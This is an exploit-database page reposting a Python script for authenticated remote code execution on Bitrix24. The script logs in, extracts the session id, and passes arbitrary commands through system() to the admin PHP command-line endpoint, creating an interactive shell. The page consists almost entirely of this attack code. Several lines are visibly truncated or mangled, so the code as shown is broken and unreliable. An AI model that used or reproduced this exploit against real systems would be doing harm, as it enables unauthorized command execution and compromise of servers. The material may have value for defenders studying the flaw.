Looking for a fix? Check your Codebase security with multiple scanners from

Edit Report

Our sensors found this exploit at:

Below is a copy:

Bitrix24 Remtoe Code Execution
# Exploit Title: Bitrix24 - Remote Code Execution (RCE) (Authenticated)
# Date: 4/22/2022
# Exploit Author: picaro_o
# Vendor Homepage:
# Tested on: Linux os

#/usr/bin/env python
#Created by heinjame

import requests
import re
from bs4 import BeautifulSoup
import argparse,sys

user_agent = {'User-agent': 'HeinJame'}

parser = argparse.ArgumentParser()
parser.add_argument("host", help="Betrix URL")
parser.add_argument("uname", help="Bitrix Username")
parser.add_argument("pass", help="Bitrix Password")
pargs = parser.parse_args()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]

inputcmd = input(">>")
s = requests.Session()
def login():

postdata = {'AUTH_FORM':'Y','TYPE':'AUTH','backurl':'%2Fstream%2F','USER_LOGIN':username,'USER_PASSWORD':password}
r ="/stream/?login=yes", headers = user_agent , data = postdata)
def getsessionid():
sessionid = s.get(url+"bitrix/admin/php_command_line?lang=en",
headers = user_agent)
session ="'bitrix_sessid':.*", sessionid.text)
extract =":")
realdata = extract[1].strip(" ")
realdata = realdata.replace("'","")
realdata = realdata.replace(",","")
return realdata
# print(r.text)
def cmdline(cmd,sessionid):
cmdline = {'query':"system('"+cmd+"');",'result_as_text':'n','ajax':'y'}
usercmd ="bitrix/admin/php_command_line.php?lang=en&sessid="+sessionid,headers
= user_agent, data = cmdline)
soup = BeautifulSoup(usercmd.content,'html.parser')
cmd = soup.find('p').getText()
sessionid = getsessionid()
while inputcmd != "exit":
inputcmd = input(">>")

Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.